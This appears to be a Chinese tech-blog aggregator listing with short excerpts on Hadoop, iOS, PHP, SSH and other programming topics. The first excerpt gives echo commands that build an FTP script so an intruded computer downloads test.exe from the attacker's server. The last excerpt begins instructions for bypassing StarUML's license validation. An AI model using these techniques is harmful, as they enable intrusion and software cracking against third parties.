用命令如何把自己电脑上的文件上传到被入侵的电脑上呢。方法有很多。用ftp是个不错的选择。方法如下echo open 你的ftpip >ftp.txtecho user >>ftp.txtecho password>>ftp.txtecho get test.exe >>ftp.txtecho bye...
分类:
Web程序 时间:
2015-09-15 23:05:50
阅读次数:
186
配置hadoop,主要是配置core-site.xml,hdfs-site.xml,mapred-site.xml三个配置文件,默认下来,这些配置文件都是空的,所以很难知道这些配置文件有哪些配置可以生效,上网找的配置可能因为各个hadoop版本不同,导致无法生效。浏览更多的配置,有两个方法:1.选择...
分类:
其他好文 时间:
2015-09-15 23:04:50
阅读次数:
208
# -*- coding: utf-8 -*-import urllib2import reimport osimport sqlite3import winsound# 打开数据库文件ppdai_db = sqlite3.connect(r'C:\Users\Jian Fang\Desktop\p...
分类:
其他好文 时间:
2015-09-15 23:06:40
阅读次数:
299
于cocos2dx反过来,我们所熟悉的控制台输出,可以查看日志,例如C介面printf();性能。int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, ...
分类:
其他好文 时间:
2015-09-15 23:05:46
阅读次数:
123
Problem DescriptionJack likes to travel around the world, but he doesn’t like to wait. Now, he is traveling in the Undirected Kingdom. There arencitie...
分类:
其他好文 时间:
2015-09-15 23:05:46
阅读次数:
167
步骤:1.创建一个Hello World模块2.为这个模块配置路由3.为这个模块创建执行控制器创建Hello World模块创建模块的结构目录:app/core/local/Sjolzy/HelloWorld/Blockapp/core/local/Sjolzy/HelloWorld/control...
分类:
其他好文 时间:
2015-09-15 23:04:07
阅读次数:
125
#pragma?mark?-
#pragma?mark?Table?view?data?source
//tableView?有多少个?section
-?(NSInteger)numberOfSectionsInTableView:(UITableView?*)tableView?{
????//?Return?the?number?of?...
分类:
其他好文 时间:
2015-09-15 22:02:06
阅读次数:
191
概览 大家都知道,在开发过程中应该尽可能减少用户等待时间,让程序尽可能快的完成运算。可是无论是哪种语言开发的程序最终往往转换成汇编语言进而解释成机器码来执行。但是机器码是按顺序执行的,一个复杂的多步...
分类:
移动开发 时间:
2015-09-15 22:02:42
阅读次数:
331
问题场景: 动态库 librabbitmq_r.so 内部依赖动态库 libevent_core.so 和 libevent_pthreads.so ; 可执行程序 sa 依赖动态库 librabbitmq_r.so ; 在链接生成 sa 的时候希望只指定 librabbitmq_r.so 而不指定 li...
分类:
系统相关 时间:
2015-09-15 22:02:07
阅读次数:
365
淘宝网 API地址: http://tcc.taobao.com/cc/json/mobile_tel_segment.htm?tel=15850781443 参数: tel:手机号码 返回:JSON 拍拍 API地址: http://virtual.paipai.com/extinfo/GetMobileProductInfo?mobile=15...
分类:
移动开发 时间:
2015-09-15 22:01:45
阅读次数:
235
今天看代码看到小坐标,觉得还不错,找了一下资料 使用的头文件是vtkOrientationMarkerWidget.h 具体使用如下,来源http://www.vtk.org/gitweb?p=VTK.git;a=blob;f=Interaction/Widgets/Testing/Cxx/TestOrientat...
分类:
系统相关 时间:
2015-09-15 22:02:52
阅读次数:
349
查看ssh服务是否安装?[root@localhost?~]#?rpm?-qa?|grep?-E?‘(ssh.*server|server.*ssh)‘
openssh-server-5.3p1-70.el6.i686
查看配置文件
[root@localhost?~]#?rpm?-qc?openssh-server
/etc/pam.d/s...
分类:
其他好文 时间:
2015-09-15 22:02:42
阅读次数:
151
//PHP通过PDO方式连接到mysql <?php?
$dsn="mysql:dbname=test;host=localhost";
$user="root";
$pass="";
$link=new?PDO($dsn,$user,$pass);
if($link){
????echo?"connect?success?with?PDO";
}else...
分类:
数据库 时间:
2015-09-15 22:01:27
阅读次数:
218
解决办法: 1、使用div,设置z-index为负数,并使此div大小为整个body的大小; 2、div里放个<img>标签,显示图片; 3、body标签的background属性去掉 具体见代码: <div?style="position:absolute;?width:100...
分类:
其他好文 时间:
2015-09-15 22:00:34
阅读次数:
148
推送SDK: 1、友盟,2、极光,3、腾讯信鸽,4、百度云推送,5、个推,6、小米,7、智游推送,8、华为推送,9、云巴, 10、盛大云推送,11、亚马逊推送 支付SDK: 1、支付宝,2、微信支付,3、银联,4、百度钱包,5...
分类:
移动开发 时间:
2015-09-15 22:02:21
阅读次数:
274
亲测,火狐和谷歌浏览器都能打开。 url:https://www.cs.usfca.edu/~galles/visualization/Algorithms.html 老外做的网站
分类:
编程语言 时间:
2015-09-15 21:59:48
阅读次数:
271
下载StarUml 2.5 ?StarUML下载 修改 LicenseManagerDomain.js function?validate(PK,?name,?product,?licenseKey)?{
????????var?pk,?decrypted;
????????//添加注释的这块代码
????...
分类:
系统相关 时间:
2015-09-15 21:59:48
阅读次数:
429